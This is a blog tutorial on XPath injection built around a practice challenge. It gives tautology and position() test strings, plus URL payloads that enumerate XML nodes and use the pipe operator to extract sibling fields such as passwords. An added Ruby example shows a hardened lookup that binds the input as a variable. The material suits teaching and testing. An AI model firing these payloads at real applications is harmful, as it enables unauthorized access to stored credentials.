
Xpath Injection (Final)


By: Multi Thinker

July 8, 2015

1. Testing and confirming Xpathi

Testing for Xpath injection (Xpathi) and confirming it are the most important parts. Many of us, and especially the readers of Security Idiots, see SQLi everywhere they find an error, even if the error is a conversion error, an internal error or a programming error. Sometimes people even assume that getting blocked by a WAF upon typing "Union Select" means the target is vulnerable to SQLi. When we see an input field, the first thing we'll do is make the condition true using the tests below:

1 or 1=1
1 or true
' or ''='
" or ""="

In the case of Xpath, SQLi and many other injections, these tests will work the same way. To confirm that it's Xpathi, we can use the position() function, which is specific to Xpath. Here are a few tests we can try:

1 or position()=1 or 1=1
1 or position()=1 or true
' or position()=1 or ''='
" or position()=1 or ""="

If any of the above works, then you can assume that the injection you are dealing with is an Xpath injection. Below is an example XML file, which we'll be using throughout this tutorial:

<xmlfile>
  <users>
    <user>
      <name first="example" last="example"/>
      <id>1</id>
      <username>Test</username>
      <password>T</password>
      <phone>123-456-7890</phone>
    </user>
    <user>
      <name first="example" last="example"/>
      <id>2</id>
      <username>example</username>
      <password>i_om-GAWWWD</password>
      <phone>603-478-4115</phone>
    </user>
    <user>
      <name first="example" last="example"/>
      <id>3</id>
      <username>example</username>
      <password>ihavemoregfsthanyou</password>
      <phone>222-222-2222</phone>
    </user>
    <user>
      <name first="example" last="example"/>
      <id>4</id>
      <username>example</username>
      <password>SelectPassFromDual</password>
      <phone>88-777 8989</phone>
    </user>
  </users>
</xmlfile>

Here are some basic Xpath queries, which can be used to extract data from the above file:

To Extract username where id=1: /xmlfile/users/user[id='1']/username

To Extract username where id=2: /xmlfile/users/user[id='2']/username

To Extract password where username is Monster: /xmlfile/users/user[username="Monster"]/password

To Extract phone where username is Trojan and password is ihavemoregfsthanyou: /xmlfile/users/user[username="Trojan" and password="ihavemoregfsthanyou"]/phone

To Extract the first username: /xmlfile/users/user[position()=1]/username

Looking at all the above example queries, I believe the basic way of extracting data with Xpath queries is clear enough.

2. Iterating through the Nodes

Let's try injecting it with Xpath. Before we start injecting, let's assume the query that could be running inside. It should be something like "/root/something/user[username='<Our_Input_here>']/phone". Assuming this, let's try these injections:

http://example.net/challenge1/challenge_2.php?username='or''='

And we got the phone number of the first user. Now, to get the number of the second user, we'll use position() as I did above:

http://example.net/challenge1/challenge_2.php?username='or position()=2 and''='

And we got the number of the second user. We can keep changing position() to get the rest of the users' phone numbers:

http://example.net/challenge1/challenge_2.php?username='or position()=3 and''='

And we got the number of the third user, and so on.

We're done iterating through the nodes, but the problem is that we aren't able to extract the other details, like passwords, which should (and must) be saved in the same XML file.

3. Extracting Data from Siblings

Until now, we were using position(). We're able to enumerate the nodes only, but the /phone at the end is hard-coded; we can't change it to extract other data. But fear not! We have the pipe operator, which combines two queries in Xpath. Here's how we can do this:

http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[2]|/a['
The above injection extracts the second element from the first node.

http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[3]|/a['
The above injection extracts the third element from the first node.

http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[4]|/a['
The above injection extracts the fourth element from the first node.

http://example.net/challenge1/challenge_2.php?username=' or position()=1]/*[5]|/a['
The above injection extracts the fifth element from the first node.

http://example.net/challenge1/challenge_2.php?username=' or position()=2]/*[2]|/a['
Here I changed the position, which means it will extract the second element from the second node; you can keep changing both numbers and extracting.
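To see why the payloads from sections 1 to 3 change the query, and what closes the hole, here is an added example (not code from the original post or from the challenge site). It assumes the query shape guessed above, /xmlfile/users/user[username='…']/phone, runs it with Ruby's bundled REXML over a constructed two-user copy of the tutorial's XML, and puts the string-concatenated lookup next to one that binds the username to an XPath variable.

```ruby
require 'rexml/document'

# Constructed sample document in the layout of the tutorial's XML file (two users are enough).
SAMPLE_XML = <<~XML
  <xmlfile>
    <users>
      <user>
        <name first="example" last="example"/>
        <id>1</id>
        <username>Test</username>
        <password>T</password>
        <phone>123-456-7890</phone>
      </user>
      <user>
        <name first="example" last="example"/>
        <id>2</id>
        <username>example</username>
        <password>i_om-GAWWWD</password>
        <phone>603-478-4115</phone>
      </user>
    </users>
  </xmlfile>
XML

DOC = REXML::Document.new(SAMPLE_XML)

# Vulnerable lookup (assumed shape of the challenge's query): the username is pasted
# straight into the XPath string, so quotes, predicates and the | operator in the
# input become part of the query itself.
def phone_unsafe(username)
  query = "/xmlfile/users/user[username='#{username}']/phone"
  REXML::XPath.match(DOC, query).map(&:text)
end

# Hardened lookup: the username is bound to the XPath variable $u through REXML's
# variables argument, so it is only ever compared as a string value.
def phone_safe(username)
  query = "/xmlfile/users/user[username=$u]/phone"
  REXML::XPath.match(DOC, query, {}, { "u" => username }).map(&:text)
end

if __FILE__ == $PROGRAM_NAME
  inputs = ["Test", "' or ''='", "' or position()=2 and ''='", "' or position()=1]/*[2]|/a['"]
  inputs.each do |value|
    puts "#{value.inspect}: unsafe=#{phone_unsafe(value).inspect} safe=#{phone_safe(value).inspect}"
  end
end
```

With the variable-bound query, every payload returns an empty list, because no user's username equals the payload text; only the concatenated query turns the tautology, the position() predicate and the pipe into extra node selections.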

Using this, we can extract data with zero knowledge of the internal file structure. Here's an Xpathi challenge you can try, solving it with the above method:


Thanks for reading this series of posts!